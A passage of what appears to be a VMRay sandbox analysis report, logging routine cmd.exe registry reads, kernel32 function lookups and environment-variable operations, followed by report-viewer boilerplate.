Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x240000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75e90000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x75ea4f70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75ea4330 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75ea5930 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 True 1
Fn
Environment (11)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\FD1HVy\Desktop True 1
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image